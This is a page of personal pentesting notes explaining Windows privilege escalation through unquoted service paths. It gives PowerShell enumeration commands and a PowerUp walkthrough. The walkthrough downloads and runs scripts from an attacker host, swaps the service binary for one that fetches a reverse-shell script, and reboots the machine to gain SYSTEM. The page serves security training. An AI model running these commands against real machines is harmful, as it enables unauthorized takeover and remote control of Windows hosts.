yuyudhn's notes
  • About
  • 🚉QUICKSTART
    • Prerequisite
    • Reconnaissance
    • Exploitation
    • Post Exploitation
    • ⛈️Misc
  • 🪟Active Directory
    • Basic Command
    • Enumeration
      • PowerView
    • Service Exploitation
      • LDAP
      • SMB
        • MS17-010
      • MSSQL
    • Privilege Escalation
      • Unquoted Service Path
      • UAC Bypass
      • Token Abuse
    • Post Exploitation
      • Tunneling with Ligolo-ng
    • Credential Hunting
      • Group Policy Preferences
      • DPAPI
  • MITRE ATT&CK
    • Defense Evasion
      • Physical Attack: Remove EDR
      • AMSI Bypass
    • Credential Access
      • Dump SAM Hashes via Registry
  • 🐧Linux
    • Misc
    • Linux Post Exploitation
    • Linux Password Hunting
  • 🐚Backdoor Stuff
    • Simple PHP Webshell
    • MSFvenom Generate Payload
  • 📳Mobile Pentest: iOS
    • iOS Penetration Testing
    • Objection
  • 🕸️Web Application
    • Common Applications
      • Tomcat
      • Joomla
    • SSTI
    • File Inclusion
    • XSS
    • Misc
  • 🖊️Machine Writeup
    • HackTheBox
      • Perfection
      • Pilgrimage
      • PC
      • Shoppy
      • GoodGames
      • Photobomb
      • Support
Powered by GitBook
On this page
  • Manual Checks
  • Unquoted Service Path with PowerUp

Was this helpful?

  1. Active Directory
  2. Privilege Escalation

Unquoted Service Path

Unquoted Service Paths – Windows Privilege Escalation

PreviousPrivilege EscalationNextUAC Bypass

Last updated 6 months ago

Was this helpful?

In simple terms, when a service is created whose executable path contains spaces and isn't enclosed within quotes, leads to a vulnerability known as Unquoted Service Path which allows a user to gain SYSTEM privileges (only if the vulnerable service is running with SYSTEM privilege level which most of the time it is).

Manual Checks

Check service without quotes:

Get-WmiObject -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$_.PathName -notlike "C:\Windows*" -and $_.PathName -notlike '"*'} | select Name,DisplayName,StartMode,PathName | fl
Manual check

Check File or Directory Permissions:

Get-ACL -Path 'C:\Program Files (x86)\IObit' | fl

Check Service Permissions:

Get-CimInstance -ClassName Win32_Service -Filter "Name = 'IObitUnSvr'" | Select-Object *

Unquoted Service Path with PowerUp

First, import PowerUp.ps1 to memory.

iex ((New-Object Net.WebClient).DownloadString('http://192.168.45.243/OSEP/powershell/PowerUp.ps1'))

Then, check for privilege escalation vectors using this command:

Invoke-AllChecks | fl

Alternatively, for checking unquoted service paths specifically, use this command:

Get-UnquotedService | fl

Example output:

For detail information about the vulnerable service, use this command:

Get-ServiceDetail -Name IObitUnSvr | Select-object *

Now, for abusing the service, you can use Write-ServiceBinary command:

Write-ServiceBinary -Name IObitUnSvr -Path "C:\Program Files (x86)\IObit\IObit.exe" -Command "powershell iex ((New-Object Net.WebClient).DownloadString('http://kali-machine/revshell.ps1'))" | fl

Basically, the above command will replace the original files with a malicious file that contains a reverse shell command.

If you have ability to restart the service, you can run:

Stop-Service -Name 'IObitUnSvr'
Start-Service -Name 'IObitUnSvr'

But, since you don't have the privilege to restart the service (CanRestart = False), you can reboot the machine since the service is set to autostart.

shutdown -r -t 0

Now, your netcat listener will have a session with the NT\SYSTEM user.

Check directory permissions
Check service details
Vulnerable Service
Service Details
Write-ServiceBinary
Shell as Admin
🪟